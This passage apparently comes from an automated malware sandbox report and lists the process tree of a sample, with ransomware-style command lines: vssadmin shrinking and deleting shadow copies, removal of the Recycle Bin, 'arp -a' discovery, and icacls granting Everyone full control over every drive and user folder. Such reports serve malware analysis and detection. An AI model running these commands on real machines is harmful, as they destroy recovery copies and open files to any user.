  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB | PID 2980
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded | PID 728
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB | PID 3324
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded | PID 1336
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB | PID 688
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded | PID 284
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" Delete Shadows /all /quiet | PID 3764
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe | "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin | PID 3640
  [2] C:\Windows\SYSTEM32\arp.exe | "arp" -a | PID 496
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" A:\* /grant Everyone:F /T /C /Q | PID 2344
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" B:\* /grant Everyone:F /T /C /Q | PID 2652
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" D:\* /grant Everyone:F /T /C /Q | PID 1560
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" E:\* /grant Everyone:F /T /C /Q | PID 3988
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" F:\* /grant Everyone:F /T /C /Q | PID 3936
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" G:\* /grant Everyone:F /T /C /Q | PID 280
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" H:\* /grant Everyone:F /T /C /Q | PID 3820
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" I:\* /grant Everyone:F /T /C /Q | PID 3852
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" J:\* /grant Everyone:F /T /C /Q | PID 3760
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" K:\* /grant Everyone:F /T /C /Q | PID 420
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" L:\* /grant Everyone:F /T /C /Q | PID 476
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" M:\* /grant Everyone:F /T /C /Q | PID 3064
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" N:\* /grant Everyone:F /T /C /Q | PID 4116
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" O:\* /grant Everyone:F /T /C /Q | PID 4160
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" P:\* /grant Everyone:F /T /C /Q | PID 4204
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" Q:\* /grant Everyone:F /T /C /Q | PID 4252
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" R:\* /grant Everyone:F /T /C /Q | PID 4296
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" S:\* /grant Everyone:F /T /C /Q | PID 4340
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" T:\* /grant Everyone:F /T /C /Q | PID 4384
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" U:\* /grant Everyone:F /T /C /Q | PID 4428
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" V:\* /grant Everyone:F /T /C /Q | PID 4472
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" W:\* /grant Everyone:F /T /C /Q | PID 4516
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" X:\* /grant Everyone:F /T /C /Q | PID 4560
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" Y:\* /grant Everyone:F /T /C /Q | PID 4604
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" Z:\* /grant Everyone:F /T /C /Q | PID 4648
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q | PID 4692
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q | PID 4780
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q | PID 4856
      - Modifies file permissions
  [2] C:\Windows\SYSTEM32\icacls.exe | "icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q | PID 4920
      - Modifies file permissions
[1] C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID 3984
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service